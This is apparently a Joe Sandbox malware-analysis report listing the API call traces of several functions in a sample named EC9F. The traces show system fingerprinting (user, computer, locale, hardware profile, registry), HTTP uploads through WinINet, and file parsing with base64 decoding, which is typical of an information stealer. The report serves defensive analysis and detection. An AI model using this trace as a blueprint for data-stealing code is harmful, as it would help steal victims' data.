Function 02D25930, Relevance: 96.3, APIs: 64, Instructions: 315stringmemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02D2593B
RtlAllocateHeap.NTDLL(00000000), ref: 02D25942
lstrcat.KERNEL32(?,0041A6E4), ref: 02D25955
lstrcat.KERNEL32(?,0041A22C), ref: 02D25966
lstrcat.KERNEL32(?,00418BC0), ref: 02D25975
lstrcat.KERNEL32(?,0041A6C4), ref: 02D25986
lstrcat.KERNEL32(?,00418BC4), ref: 02D25995
lstrcat.KERNEL32(?,0041A544), ref: 02D259A6
lstrcat.KERNEL32(?,00418BC0), ref: 02D259B5
lstrcat.KERNEL32(?,0041A79C), ref: 02D259C6
GetCurrentProcessId.KERNEL32 ref: 02D259CC

Part of subcall function 02D2BBA0: OpenProcess.KERNEL32(00000410,00000000,?), ref: 02D2BBB4
Part of subcall function 02D2BBA0: GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02D2BBD5
Part of subcall function 02D2BBA0: CloseHandle.KERNEL32(00000000), ref: 02D2BBDF

lstrcat.KERNEL32(?,00000000), ref: 02D259E0
lstrcat.KERNEL32(?,00418BC0), ref: 02D259EF
lstrcat.KERNEL32(?,0041A55C), ref: 02D259FF

Part of subcall function 02D2AF30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,02D25A0A), ref: 02D2AF3D
Part of subcall function 02D2AF30: RtlAllocateHeap.NTDLL(00000000), ref: 02D2AF44
Part of subcall function 02D2AF30: GetLocalTime.KERNEL32(?,?,?,?,?,02D25A0A), ref: 02D2AF51
Part of subcall function 02D2AF30: wsprintfA.USER32 ref: 02D2AF7E

lstrcat.KERNEL32(?,00000000), ref: 02D25A0F
lstrcat.KERNEL32(?,00418BC4), ref: 02D25A1E
lstrcat.KERNEL32(?,0041A044), ref: 02D25A2F

Part of subcall function 02D2AF90: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D2AFA0
Part of subcall function 02D2AF90: RtlAllocateHeap.NTDLL(00000000), ref: 02D2AFA7
Part of subcall function 02D2AF90: GetTimeZoneInformation.KERNEL32(?), ref: 02D2AFBA

lstrcat.KERNEL32(?,00000000), ref: 02D25A3F
lstrcat.KERNEL32(?,00418BC0), ref: 02D25A4E
lstrcat.KERNEL32(?,0041A0FC), ref: 02D25A5F

Part of subcall function 02D2B010: GetUserDefaultLocaleName.KERNEL32(?,00000055), ref: 02D2B022

lstrcat.KERNEL32(?,00000000), ref: 02D25A6F
lstrcat.KERNEL32(?,00418BC4), ref: 02D25A7E
lstrcat.KERNEL32(?,0041A040), ref: 02D25A8E

Part of subcall function 02D2B050: GetProcessHeap.KERNEL32(00000000,000001F4), ref: 02D2B060
Part of subcall function 02D2B050: RtlAllocateHeap.NTDLL(00000000), ref: 02D2B067
Part of subcall function 02D2B050: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 02D2B088
Part of subcall function 02D2B050: LocalAlloc.KERNEL32(00000040,?), ref: 02D2B0A0
Part of subcall function 02D2B050: GetKeyboardLayoutList.USER32(?,00000000), ref: 02D2B0B4
Part of subcall function 02D2B050: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 02D2B109
Part of subcall function 02D2B050: wsprintfA.USER32 ref: 02D2B132
Part of subcall function 02D2B050: wsprintfA.USER32 ref: 02D2B150
Part of subcall function 02D2B050: memset.NTDLL ref: 02D2B176
Part of subcall function 02D2B050: LocalFree.KERNEL32(00000000), ref: 02D2B18B

lstrcat.KERNEL32(?,00000000), ref: 02D25A9E
lstrcat.KERNEL32(?,00418BC0), ref: 02D25AAD
lstrcat.KERNEL32(?,0041A500), ref: 02D25ABE

Part of subcall function 02D2B1A0: GetSystemPowerStatus.KERNEL32(?), ref: 02D2B1AA

lstrcat.KERNEL32(?,00000000), ref: 02D25ACE
lstrcat.KERNEL32(?,00418BC4), ref: 02D25ADD
lstrcat.KERNEL32(?,0041A164), ref: 02D25AEE

Part of subcall function 02D2B1D0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D2B1E4
Part of subcall function 02D2B1D0: RtlAllocateHeap.NTDLL(00000000), ref: 02D2B1EB
Part of subcall function 02D2B1D0: RegOpenKeyExA.ADVAPI32(80000002,0041A1A0,00000000,00020119,02D25AF9), ref: 02D2B20B
Part of subcall function 02D2B1D0: RegQueryValueExA.ADVAPI32(02D25AF9,0041A5E4,00000000,00000000,?,000000FF), ref: 02D2B22C
Part of subcall function 02D2B1D0: RegCloseKey.ADVAPI32(02D25AF9), ref: 02D2B236

lstrcat.KERNEL32(?,00000000), ref: 02D25AFE
lstrcat.KERNEL32(?,00418BC4), ref: 02D25B0D
lstrcat.KERNEL32(?,0041A580), ref: 02D25B1D

Part of subcall function 02D2B250: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D2B25D
Part of subcall function 02D2B250: RtlAllocateHeap.NTDLL(00000000), ref: 02D2B264
Part of subcall function 02D2B250: memset.NTDLL ref: 02D2B275
Part of subcall function 02D2B250: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 02D2B286
Part of subcall function 02D2B250: __aulldiv.LIBCMT ref: 02D2B2A0
Part of subcall function 02D2B250: wsprintfA.USER32 ref: 02D2B2CC

lstrcat.KERNEL32(?,00000000), ref: 02D25B2D
lstrcat.KERNEL32(?,00418BC4), ref: 02D25B3C
lstrcat.KERNEL32(?,0041A2A8), ref: 02D25B4D

Part of subcall function 02D2B2E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D2B2F4
Part of subcall function 02D2B2E0: RtlAllocateHeap.NTDLL(00000000), ref: 02D2B2FB
Part of subcall function 02D2B2E0: RegOpenKeyExA.ADVAPI32(80000002,0041A3F4,00000000,00020119,02D25B58), ref: 02D2B31B
Part of subcall function 02D2B2E0: RegQueryValueExA.ADVAPI32(02D25B58,0041A4DC,00000000,00000000,?,000000FF), ref: 02D2B33C
Part of subcall function 02D2B2E0: RegCloseKey.ADVAPI32(02D25B58), ref: 02D2B346

lstrcat.KERNEL32(?,00000000), ref: 02D25B5D
lstrcat.KERNEL32(?,0041A0A8), ref: 02D25B6E

Part of subcall function 02D2B360: GetCurrentProcess.KERNEL32(00000000), ref: 02D2B36F
Part of subcall function 02D2B360: IsWow64Process.KERNEL32(00000000), ref: 02D2B376

lstrcat.KERNEL32(?,00000000), ref: 02D25B7E
lstrcat.KERNEL32(?,0041A10C), ref: 02D25B8F
lstrcat.KERNEL32(?,00418BC4), ref: 02D25B9E
lstrcat.KERNEL32(?,0041A798), ref: 02D25BAF
lstrcat.KERNEL32(?,00000000), ref: 02D25BBF
lstrcat.KERNEL32(?,00418BC4), ref: 02D25BCE
lstrcat.KERNEL32(?,0041A424), ref: 02D25BDF

Part of subcall function 02D2B3D0: wsprintfA.USER32 ref: 02D2B42C

lstrcat.KERNEL32(?,00000000), ref: 02D25BEF
lstrcat.KERNEL32(?,00418BC0), ref: 02D25BFE
lstrcat.KERNEL32(?,0041A75C), ref: 02D25C0E

Part of subcall function 02D2AEA0: GetProcessHeap.KERNEL32(00000000,00000104,?,02D25C19), ref: 02D2AEAD
Part of subcall function 02D2AEA0: RtlAllocateHeap.NTDLL(00000000,?,02D25C19), ref: 02D2AEB4
Part of subcall function 02D2AEA0: GetComputerNameA.KERNEL32(02D25C19,00000104), ref: 02D2AECC

lstrcat.KERNEL32(?,00000000), ref: 02D25C1E
lstrcat.KERNEL32(?,00418BC4), ref: 02D25C2D
lstrcat.KERNEL32(?,0041A4A4), ref: 02D25C3E

Part of subcall function 02D2AEF0: GetProcessHeap.KERNEL32(00000000,00000104,?,02D25C49), ref: 02D2AEFD
Part of subcall function 02D2AEF0: RtlAllocateHeap.NTDLL(00000000,?,02D25C49), ref: 02D2AF04
Part of subcall function 02D2AEF0: GetUserNameA.ADVAPI32(?,00000104), ref: 02D2AF1C

lstrcat.KERNEL32(?,00000000), ref: 02D25C4E
lstrcat.KERNEL32(?,00418BC4), ref: 02D25C5D
lstrcat.KERNEL32(?,0041A3C0), ref: 02D25C6E
lstrcat.KERNEL32(?,00000000), ref: 02D25C7E
lstrcat.KERNEL32(?,00418BC4), ref: 02D25C8D
lstrcat.KERNEL32(?,0041A6C0), ref: 02D25C9D

Part of subcall function 02D2B490: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D2B4A4
Part of subcall function 02D2B490: RtlAllocateHeap.NTDLL(00000000), ref: 02D2B4AB
Part of subcall function 02D2B490: RegOpenKeyExA.ADVAPI32(80000002,0041A610,00000000,00020119,02D25CA8), ref: 02D2B4CB
Part of subcall function 02D2B490: RegQueryValueExA.ADVAPI32(02D25CA8,0041A1F4,00000000,00000000,?,000000FF), ref: 02D2B4EC
Part of subcall function 02D2B490: RegCloseKey.ADVAPI32(02D25CA8), ref: 02D2B4F6

lstrcat.KERNEL32(?,00000000), ref: 02D25CAD
lstrcat.KERNEL32(?,00418BC4), ref: 02D25CBC
lstrcat.KERNEL32(?,0041A074), ref: 02D25CCD

Part of subcall function 02D2B510: GetCurrentHwProfileA.ADVAPI32(?), ref: 02D2B51D
Part of subcall function 02D2B510: GetProcessHeap.KERNEL32(00000000,00000064), ref: 02D2B52B
Part of subcall function 02D2B510: RtlAllocateHeap.NTDLL(00000000), ref: 02D2B532
Part of subcall function 02D2B510: memset.NTDLL ref: 02D2B549
Part of subcall function 02D2B510: lstrcat.KERNEL32(?,?), ref: 02D2B55A

lstrcat.KERNEL32(?,00000000), ref: 02D25CDD
lstrcat.KERNEL32(?,00418BC0), ref: 02D25CEC
lstrcat.KERNEL32(?,0041A31C), ref: 02D25CFD
lstrcat.KERNEL32(?,00418BC4), ref: 02D25D0C
lstrlen.KERNEL32(?), ref: 02D25D22

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: lstrcat$Heap$Process$Allocate$wsprintf$CloseNameOpen$CurrentLocalQueryValuememset$KeyboardLayoutListLocaleStatusTimeUser$AllocComputerDefaultFileFreeGlobalHandleInfoInformationMemoryModulePowerProfileSystemWow64Zone__aulldivlstrlen
String ID:
API String ID: 874587921-0
Opcode ID: bcc991ba470c67d8952ad77bc2a985274ce3c746d34fc9ddb68a3c0860890d22
Instruction ID: 2e640ee020ddf4ed51416453f8d35c2d4fcb4872d431fd9c2b7c3f863a055271
Opcode Fuzzy Hash: bcc991ba470c67d8952ad77bc2a985274ce3c746d34fc9ddb68a3c0860890d22
Instruction Fuzzy Hash: B0C109BA611504FBCB04DBE4DF88D9E77B9AF4C3457208569B201D3661CA78AE20DF29

Uniqueness

Uniqueness Score: -1.00%

Function 004056E0, Relevance: 96.3, APIs: 64, Instructions: 315stringmemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000F423F,?,?,004067CA,?,?,?,?,?,00000104,?,00001388), ref: 004056EB
RtlAllocateHeap.NTDLL(00000000,?,004067CA), ref: 004056F2
lstrcat.KERNEL32(?,02E32520), ref: 00405705
lstrcat.KERNEL32(?,02E32490), ref: 00405716
lstrcat.KERNEL32(?,00418BC0), ref: 00405725
lstrcat.KERNEL32(?,02E49AA8), ref: 00405736
lstrcat.KERNEL32(?,00418BC4), ref: 00405745
lstrcat.KERNEL32(?,02E331C8), ref: 00405756
lstrcat.KERNEL32(?,00418BC0), ref: 00405765
lstrcat.KERNEL32(?,02E46F70), ref: 00405776
GetCurrentProcessId.KERNEL32(?,004067CA,?,?,?,?,?,00000104,?,00001388), ref: 0040577C

Part of subcall function 0040B950: OpenProcess.KERNEL32(00000410,00000000,004067CA), ref: 0040B964
Part of subcall function 0040B950: GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 0040B985
Part of subcall function 0040B950: CloseHandle.KERNEL32(00000000), ref: 0040B98F

lstrcat.KERNEL32(?,00000000), ref: 00405790
lstrcat.KERNEL32(00418BC0,00418BC0), ref: 0040579F
lstrcat.KERNEL32(02E47048,02E47048), ref: 004057AF

Part of subcall function 0040ACE0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,004057BA,?,?,?,?,00000104,?,00001388), ref: 0040ACED
Part of subcall function 0040ACE0: RtlAllocateHeap.NTDLL(00000000), ref: 0040ACF4
Part of subcall function 0040ACE0: GetLocalTime.KERNEL32(?,?,?,?,?,?,004057BA,?,?,?,?,00000104,?,00001388), ref: 0040AD01
Part of subcall function 0040ACE0: wsprintfA.USER32 ref: 0040AD2E

lstrcat.KERNEL32(00000000,00000000), ref: 004057BF
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 004057CE
lstrcat.KERNEL32(02E46F88,02E46F88), ref: 004057DF

Part of subcall function 0040AD40: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040AD50
Part of subcall function 0040AD40: RtlAllocateHeap.NTDLL(00000000), ref: 0040AD57
Part of subcall function 0040AD40: GetTimeZoneInformation.KERNEL32(?), ref: 0040AD6A

lstrcat.KERNEL32(00000000,00000000), ref: 004057EF
lstrcat.KERNEL32(00418BC0,00418BC0), ref: 004057FE
lstrcat.KERNEL32(02E32FA8,02E32FA8), ref: 0040580F

Part of subcall function 0040ADC0: GetUserDefaultLocaleName.KERNEL32(?,00000055), ref: 0040ADD2

lstrcat.KERNEL32(00000000,00000000), ref: 0040581F
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 0040582E
lstrcat.KERNEL32(02E32FC8,02E32FC8), ref: 0040583E

Part of subcall function 0040AE00: GetProcessHeap.KERNEL32(00000000,000001F4), ref: 0040AE10
Part of subcall function 0040AE00: RtlAllocateHeap.NTDLL(00000000), ref: 0040AE17
Part of subcall function 0040AE00: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0040AE38
Part of subcall function 0040AE00: LocalAlloc.KERNEL32(00000040,?), ref: 0040AE50
Part of subcall function 0040AE00: GetKeyboardLayoutList.USER32(?,00000000), ref: 0040AE64
Part of subcall function 0040AE00: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0040AEB9
Part of subcall function 0040AE00: wsprintfA.USER32 ref: 0040AEE2
Part of subcall function 0040AE00: wsprintfA.USER32 ref: 0040AF00
Part of subcall function 0040AE00: memset.NTDLL ref: 0040AF26
Part of subcall function 0040AE00: LocalFree.KERNEL32(00000000), ref: 0040AF3B

lstrcat.KERNEL32(00000000,00000000), ref: 0040584E
lstrcat.KERNEL32(00418BC0,00418BC0), ref: 0040585D
lstrcat.KERNEL32(02E46FA0,02E46FA0), ref: 0040586E

Part of subcall function 0040AF50: GetSystemPowerStatus.KERNEL32(?), ref: 0040AF5A

lstrcat.KERNEL32(00000000,00000000), ref: 0040587E
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 0040588D
lstrcat.KERNEL32(02E46DD8,02E46DD8), ref: 0040589E

Part of subcall function 0040AF80: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040AF94
Part of subcall function 0040AF80: RtlAllocateHeap.NTDLL(00000000), ref: 0040AF9B
Part of subcall function 0040AF80: RegOpenKeyExA.ADVAPI32(80000002,02E4B8C0,00000000,00020119,?), ref: 0040AFBB
Part of subcall function 0040AF80: RegQueryValueExA.ADVAPI32(?,02E4AD80,00000000,00000000,?,000000FF), ref: 0040AFDC
Part of subcall function 0040AF80: RegCloseKey.ADVAPI32(?), ref: 0040AFE6

lstrcat.KERNEL32(00000000,00000000), ref: 004058AE
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 004058BD
lstrcat.KERNEL32(02E46DF0,02E46DF0), ref: 004058CD

Part of subcall function 0040B000: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040B00D
Part of subcall function 0040B000: RtlAllocateHeap.NTDLL(00000000), ref: 0040B014
Part of subcall function 0040B000: memset.NTDLL ref: 0040B025
Part of subcall function 0040B000: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 0040B036
Part of subcall function 0040B000: __aulldiv.LIBCMT ref: 0040B050
Part of subcall function 0040B000: wsprintfA.USER32 ref: 0040B07C

lstrcat.KERNEL32(00000000,00000000), ref: 004058DD
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 004058EC
lstrcat.KERNEL32(02E49A58,02E49A58), ref: 004058FD

Part of subcall function 0040B090: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040B0A4
Part of subcall function 0040B090: RtlAllocateHeap.NTDLL(00000000), ref: 0040B0AB
Part of subcall function 0040B090: RegOpenKeyExA.ADVAPI32(80000002,02E4B658,00000000,00020119,?), ref: 0040B0CB
Part of subcall function 0040B090: RegQueryValueExA.ADVAPI32(?,02E4BBA8,00000000,00000000,?,000000FF), ref: 0040B0EC
Part of subcall function 0040B090: RegCloseKey.ADVAPI32(?), ref: 0040B0F6

lstrcat.KERNEL32(00000000,00000000), ref: 0040590D
lstrcat.KERNEL32(02E49B48,02E49B48), ref: 0040591E

Part of subcall function 0040B110: GetCurrentProcess.KERNEL32(00000000), ref: 0040B11F
Part of subcall function 0040B110: IsWow64Process.KERNEL32(00000000), ref: 0040B126

lstrcat.KERNEL32(00000000,00000000), ref: 0040592E
lstrcat.KERNEL32(02E49B58,02E49B58), ref: 0040593F
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 0040594E
lstrcat.KERNEL32(02E46E20,02E46E20), ref: 0040595F
lstrcat.KERNEL32(00000000,00000000), ref: 0040596F
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 0040597E
lstrcat.KERNEL32(02E32FE8,02E32FE8), ref: 0040598F

Part of subcall function 0040B180: wsprintfA.USER32 ref: 0040B1DC

lstrcat.KERNEL32(00000000,00000000), ref: 0040599F
lstrcat.KERNEL32(00418BC0,00418BC0), ref: 004059AE
lstrcat.KERNEL32(02E46FB8,02E46FB8), ref: 004059BE

Part of subcall function 0040AC50: GetProcessHeap.KERNEL32(00000000,00000104,?,00406B8D), ref: 0040AC5D
Part of subcall function 0040AC50: RtlAllocateHeap.NTDLL(00000000,?,00406B8D), ref: 0040AC64
Part of subcall function 0040AC50: GetComputerNameA.KERNEL32(00406B8D,00000104), ref: 0040AC7C

lstrcat.KERNEL32(00000000,00000000), ref: 004059CE
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 004059DD
lstrcat.KERNEL32(02E46FD0,02E46FD0), ref: 004059EE

Part of subcall function 0040ACA0: GetProcessHeap.KERNEL32(00000000,00000104,00406B14,JohnDoe,?,00406B8D), ref: 0040ACAD
Part of subcall function 0040ACA0: RtlAllocateHeap.NTDLL(00000000,?,00406B8D), ref: 0040ACB4
Part of subcall function 0040ACA0: GetUserNameA.ADVAPI32(?,00000104), ref: 0040ACCC

lstrcat.KERNEL32(00000000,00000000), ref: 004059FE
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 00405A0D
lstrcat.KERNEL32(02E46E98,02E46E98), ref: 00405A1E
lstrcat.KERNEL32(00000000,00000000), ref: 00405A2E
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 00405A3D
lstrcat.KERNEL32(02E46EB0,02E46EB0), ref: 00405A4D

Part of subcall function 0040B240: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040B254
Part of subcall function 0040B240: RtlAllocateHeap.NTDLL(00000000), ref: 0040B25B
Part of subcall function 0040B240: RegOpenKeyExA.ADVAPI32(80000002,02E494A0,00000000,00020119,?), ref: 0040B27B
Part of subcall function 0040B240: RegQueryValueExA.ADVAPI32(?,02E4BBF0,00000000,00000000,?,000000FF), ref: 0040B29C
Part of subcall function 0040B240: RegCloseKey.ADVAPI32(?), ref: 0040B2A6

lstrcat.KERNEL32(00000000,00000000), ref: 00405A5D
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 00405A6C
lstrcat.KERNEL32(02E49B18,02E49B18), ref: 00405A7D

Part of subcall function 0040B2C0: GetCurrentHwProfileA.ADVAPI32(?), ref: 0040B2CD
Part of subcall function 0040B2C0: GetProcessHeap.KERNEL32(00000000,00000064), ref: 0040B2DB
Part of subcall function 0040B2C0: RtlAllocateHeap.NTDLL(00000000), ref: 0040B2E2
Part of subcall function 0040B2C0: memset.NTDLL ref: 0040B2F9
Part of subcall function 0040B2C0: lstrcat.KERNEL32(?,?), ref: 0040B30A

lstrcat.KERNEL32(00000000,00000000), ref: 00405A8D
lstrcat.KERNEL32(00418BC0,00418BC0), ref: 00405A9C
lstrcat.KERNEL32(02E33048,02E33048), ref: 00405AAD
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 00405ABC

Part of subcall function 0040B330: RegOpenKeyExA.ADVAPI32(80000002,02E2E668,00000000,00020019,00000000), ref: 0040B382

lstrlen.KERNEL32(?,?,?,?,?,?,?,00000104,?,00001388), ref: 00405AD2

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: lstrcat$Heap$Process$Allocate$Openwsprintf$CloseName$CurrentLocalQueryValuememset$KeyboardLayoutListLocaleStatusTimeUser$AllocComputerDefaultFileFreeGlobalHandleInfoInformationMemoryModulePowerProfileSystemWow64Zone__aulldivlstrlen
String ID:
API String ID: 1685704716-0
Opcode ID: e218a5e356af2615d6aaa017568bf9cb7d31594a9bde99fdcaaeb157979fca9f
Instruction ID: 30c1e02cd9c5137cb8aca07fd8d84d5d1b54e9b10edc29ade13e80b98b9e1d91
Opcode Fuzzy Hash: e218a5e356af2615d6aaa017568bf9cb7d31594a9bde99fdcaaeb157979fca9f
Instruction Fuzzy Hash: 40C11BBA611504FFCB00DBE4DF89D9E77B9AF4C3457208569B205D3661CB3CAA20DB29

Uniqueness

Uniqueness Score: -1.00%

Function 02D24E30, Relevance: 84.4, APIs: 56, Instructions: 371stringnetworkmemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00800000,?,00000200,?,000001F4,?,00000000,00001388), ref: 02D24E7A
RtlAllocateHeap.NTDLL(00000000), ref: 02D24E81
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02D24EA8
InternetSetOptionA.WININET(?,00000002,000927C0,00000004), ref: 02D24ECA
StrCmpCA.SHLWAPI(?,00418B90), ref: 02D24EED
lstrcat.KERNEL32(?,00000000), ref: 02D24F20
lstrcat.KERNEL32(?,00418B9C), ref: 02D24F32
lstrcat.KERNEL32(?,00418BA0), ref: 02D24F44
lstrcat.KERNEL32(?,?), ref: 02D24F58
lstrcat.KERNEL32(?,00418BA8), ref: 02D24F6A
lstrcat.KERNEL32(?,00418B9C), ref: 02D24F7C
lstrcat.KERNEL32(?,0041A1BC), ref: 02D24F90
lstrcat.KERNEL32(?,?), ref: 02D24FA4
InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00000000,00000000), ref: 02D24FCD
InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 02D24FF2
HttpOpenRequestA.WININET(00000000,0041A590,?,0041A2D8,00000000,00000000,00C00100,00000000), ref: 02D25037
HttpOpenRequestA.WININET(00000000,0041A590,?,0041A2D8,00000000,00000000,00400100,00000000), ref: 02D25069
lstrcat.KERNEL32(?,00418BA0), ref: 02D2508E
lstrcat.KERNEL32(?,?), ref: 02D250A2
lstrcat.KERNEL32(?,00418B9C), ref: 02D250B4
lstrcat.KERNEL32(?,0041A2CC), ref: 02D250C8
lstrcat.KERNEL32(?,0041A058), ref: 02D250DB
lstrcat.KERNEL32(?,00418BAC), ref: 02D250ED
lstrcat.KERNEL32(?,?), ref: 02D250FE
lstrcat.KERNEL32(?,00418B9C), ref: 02D25110
lstrcat.KERNEL32(?,00418BA0), ref: 02D25122
lstrcat.KERNEL32(?,?), ref: 02D25136
lstrcat.KERNEL32(?,00418B9C), ref: 02D25148
lstrcat.KERNEL32(?,0041A644), ref: 02D2515C
lstrcat.KERNEL32(?,?), ref: 02D2516D
lstrcat.KERNEL32(?,00418BB4), ref: 02D2517F
lstrcat.KERNEL32(?,0041A038), ref: 02D25192
lstrcat.KERNEL32(?,00418B9C), ref: 02D251A4
lstrcat.KERNEL32(?,0041A538), ref: 02D251B7
lstrcat.KERNEL32(?,00418BB8), ref: 02D251C9
lstrlen.KERNEL32(?), ref: 02D251D6
lstrlen.KERNEL32(?), ref: 02D251E8
GetProcessHeap.KERNEL32(00000000,?), ref: 02D251FF
RtlAllocateHeap.NTDLL(00000000), ref: 02D25206
lstrlen.KERNEL32(?), ref: 02D25219
memcpy.NTDLL(?,?,00000000), ref: 02D2522E
lstrlen.KERNEL32(?,?,?), ref: 02D25243
memcpy.NTDLL(?), ref: 02D25250
lstrlen.KERNEL32(?), ref: 02D2525D
lstrlen.KERNEL32(?,?,00000000), ref: 02D25272
memcpy.NTDLL(?), ref: 02D25282
lstrlen.KERNEL32(?,?,?), ref: 02D252C1
HttpSendRequestA.WININET(00000000,?,00000000), ref: 02D252D6
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 02D252F5
StrCmpCA.SHLWAPI(?,00418B8C), ref: 02D2530B
Sleep.KERNEL32(00007530), ref: 02D2531C
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02D2536D
lstrcat.KERNEL32(?,00000000), ref: 02D253A9
InternetCloseHandle.WININET(?), ref: 02D253B8
InternetCloseHandle.WININET(?), ref: 02D253C5
InternetCloseHandle.WININET(00000000), ref: 02D253D2

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: lstrcat$Internet$lstrlen$HeapHttp$CloseHandleOpenRequestmemcpy$AllocateConnectProcess$FileInfoOptionQueryReadSendSleep
String ID:
API String ID: 3074752877-0
Opcode ID: 3fd957372ece58c1ff5bf28ab583384af2cc8a0d24938a39976a5e03bacea6dd
Instruction ID: be01e5c47d67e38953b110fe5926c75704a2602b2cbdf6063a4fe8a70c897afa
Opcode Fuzzy Hash: 3fd957372ece58c1ff5bf28ab583384af2cc8a0d24938a39976a5e03bacea6dd
Instruction Fuzzy Hash: 47F195B5A41218AFCB24DFA0DD48FDA7779BF48704F0085D9F209A7181CB74AAA4CF59

Uniqueness

Uniqueness Score: -1.00%

Function 02D292B0, Relevance: 61.5, APIs: 34, Strings: 1, Instructions: 236stringfileCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0041A0C4), ref: 02D29305
lstrcat.KERNEL32(?,00414018), ref: 02D29317
lstrcat.KERNEL32(?,0041A7E4), ref: 02D2932B
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02D2935B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 02D29381
GetFileSize.KERNEL32(00000000,00000000), ref: 02D29390
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D293A9
new[].LIBCMTD ref: 02D293B9
ReadFile.KERNEL32(00000000,?,00000000,0041ABA8,00000000), ref: 02D293E8
StrStrA.SHLWAPI(?,0041A170), ref: 02D293F9
lstrlen.KERNEL32(0041A170), ref: 02D29419
StrStrA.SHLWAPI(00000000,0041A3B0), ref: 02D2943D
lstrcat.KERNEL32(0041A838,0041A334), ref: 02D29463
lstrcat.KERNEL32(0041A838,?), ref: 02D29474
lstrcat.KERNEL32(0041A838,00418BC4), ref: 02D29486
lstrcat.KERNEL32(0041A838,0041A37C), ref: 02D29499
lstrcat.KERNEL32(0041A838,00000020), ref: 02D294A9
lstrcat.KERNEL32(0041A838,00418BC4), ref: 02D294BB
lstrcat.KERNEL32(0041A838,0041A144), ref: 02D294CE
lstrcat.KERNEL32(0041A838,00000000), ref: 02D294E2
lstrcat.KERNEL32(0041A838,00418BC4), ref: 02D294F3
StrStrA.SHLWAPI(?,0041A5B8), ref: 02D2950A
lstrlen.KERNEL32(0041A5B8), ref: 02D29518
StrStrA.SHLWAPI(00000000,0041A5B4), ref: 02D29536
lstrcat.KERNEL32(0041A838,0041A06C), ref: 02D2955B

Part of subcall function 02D279F0: lstrlen.KERNEL32(02D2956D,00000001,?,00001FA0,00000000,00000000,?,00001FA0), ref: 02D27A3B
Part of subcall function 02D279F0: CryptStringToBinaryA.CRYPT32(02D2956D,00000000), ref: 02D27A46

lstrcat.KERNEL32(0041A838,00000000), ref: 02D29578
lstrcat.KERNEL32(0041A838,00418BC4), ref: 02D29589
StrStrA.SHLWAPI(?,0041A5B4), ref: 02D295A0
lstrlen.KERNEL32(0041A5B4), ref: 02D295AE
StrStrA.SHLWAPI(00000000,0041A70C), ref: 02D295CC
lstrcat.KERNEL32(0041A838,0041A14C), ref: 02D295F1

Part of subcall function 02D279F0: lstrcat.KERNEL32(?,0041401A), ref: 02D27B09
Part of subcall function 02D279F0: lstrcat.KERNEL32(?,0041401A), ref: 02D27B1D
Part of subcall function 02D279F0: lstrcat.KERNEL32(0041401A,0041401A), ref: 02D27B3E

lstrcat.KERNEL32(0041A838,00000000), ref: 02D2960E
lstrcat.KERNEL32(0041A838,00418BC0), ref: 02D2961F
CloseHandle.KERNEL32(00000000), ref: 02D2963D

Strings

, xrefs: 02D292DF

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: lstrcat$File$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringnew[]
String ID:
API String ID: 3141130001-3916222277
